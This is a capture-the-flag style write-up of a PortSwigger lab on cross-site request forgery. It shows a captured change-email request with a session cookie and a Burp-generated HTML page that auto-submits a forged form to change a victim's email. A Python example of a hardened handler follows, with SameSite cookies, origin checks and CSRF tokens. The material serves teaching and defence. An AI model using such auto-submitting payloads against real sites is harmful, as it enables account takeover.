CSRF vulnerability with no defenses

Description

This lab's email change functionality is vulnerable to CSRF.

To solve the lab, craft some HTML that uses a CSRF attack to change the viewer's email address and upload it to your exploit server.

You can log in to your own account using the following credentials: wiener:peter

Approach

After accessing the lab, I intercepted the change email request and sent it to Repeater in Burp Suite:

POST /my-account/change-email HTTP/1.1
Host: 0a82009c0322bb4484beb90e00980091.web-security-academy.net
Cookie: session=N175cbqXv2yEe97sAbA1PpVmMwWts5tE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
...

email=qwe%40qwe.com

My goal was to change the victim's email address, so I decided to host a malicious page that would automatically submit the change email form from the lab when accessed. First, I needed to craft a CSRF exploit, and to do that, I used the CSRF PoC generator built into Burp Suite Professional, which is very useful and saves time, though it’s possible to write the PoC manually.

By right-clicking the request and selecting Engagement tools / Generate CSRF PoC, I generated the following HTML:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a82009c0322bb4484beb90e00980091.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="hacked&#64;ichyaboy&#46;htb" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

I modified the email value to a new one to avoid any issues indicating that the email was already in use. Then, I copied and pasted this HTML into my exploit server.

After clicking Store and Deliver exploit to victim, I saw that the lab was solved, confirming the change of the victim's email.
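The request captured above carries nothing but the session cookie and the `email` field, which is why a form auto-submitted from another origin is accepted. The following added example (not part of the original writeup or of the lab's own code) models the change-email endpoint with the defenses the lab leaves out, so the same cross-site submission is rejected: a `SameSite=Lax` session cookie, an Origin/Referer check against the site's own origin, and a per-session CSRF token compared in constant time. The origin `https://example.lab`, the session store and the request headers are constructed for the example; the lab host is not used.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

# Hypothetical origin of the application; the real lab host is not used here.
SITE_ORIGIN = "https://example.lab"

# Constructed in-memory session store: session id -> session data.
SESSIONS = {}


def create_session(user):
    """Log a user in: mint a session id and a per-session CSRF token."""
    sid = secrets.token_urlsafe(24)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(24), "email": None}
    return sid


def session_cookie_header(sid):
    """Set-Cookie value. SameSite=Lax makes the browser omit the cookie on
    cross-site POSTs such as the auto-submitted form in the PoC above."""
    return f"session={sid}; Secure; HttpOnly; SameSite=Lax"


def parse_cookies(header):
    """Parse a Cookie request header into a dict."""
    out = {}
    for part in header.split(";"):
        if "=" in part:
            name, _, value = part.strip().partition("=")
            out[name] = value
    return out


def same_origin(url, expected):
    """True if url's scheme and host match the expected origin."""
    a, b = urlparse(url), urlparse(expected)
    return (a.scheme, a.netloc) == (b.scheme, b.netloc)


def handle_change_email(headers, body):
    """Server-side handler for POST /my-account/change-email.

    headers: dict with lowercase header names; body: form-urlencoded string.
    Returns (status, message)."""
    cookies = parse_cookies(headers.get("cookie", ""))
    sess = SESSIONS.get(cookies.get("session", ""))
    if sess is None:
        return 401, "no valid session"

    # Defense 1: the request must originate from our own origin.
    source = headers.get("origin") or headers.get("referer")
    if source is None or not same_origin(source, SITE_ORIGIN):
        return 403, "cross-site request blocked"

    # Defense 2: the form must carry the token bound to this session.
    form = parse_qs(body)
    token = form.get("csrf", [""])[0]
    if not hmac.compare_digest(token, sess["csrf"]):
        return 403, "missing or invalid CSRF token"

    email = form.get("email", [""])[0]
    if not email:
        return 400, "email required"
    sess["email"] = email
    return 200, "email updated"


def demo():
    """Replay the lab's scenario against the hardened handler."""
    sid = create_session("wiener")
    token = SESSIONS[sid]["csrf"]

    # Legitimate submission from the site's own page, token included.
    legit = handle_change_email(
        {"cookie": f"session={sid}", "origin": SITE_ORIGIN},
        f"email=wiener%40example.lab&csrf={token}",
    )
    # The PoC: a cross-site page auto-submits the form. A browser honouring
    # SameSite=Lax does not attach the cookie, so the request has none.
    no_cookie = handle_change_email(
        {"origin": "https://attacker.example"}, "email=hacked%40attacker.example"
    )
    # A browser that still sends the cookie cross-site: Origin check fails.
    cross_site = handle_change_email(
        {"cookie": f"session={sid}", "origin": "https://attacker.example"},
        "email=hacked%40attacker.example",
    )
    # Same origin but the token cannot be read cross-site, so it is wrong.
    bad_token = handle_change_email(
        {"cookie": f"session={sid}", "origin": SITE_ORIGIN},
        "email=hacked%40attacker.example&csrf=guess",
    )
    return {
        "legit": legit[0], "no_cookie": no_cookie[0], "cross_site": cross_site[0],
        "bad_token": bad_token[0], "email": SESSIONS[sid]["email"],
    }


if __name__ == "__main__":
    print(demo())
```

Rejecting requests with neither an `Origin` nor a `Referer` header is a deliberate choice here; some privacy settings strip both, so production code usually treats the token as the primary control and the origin check as a secondary one rather than the other way round.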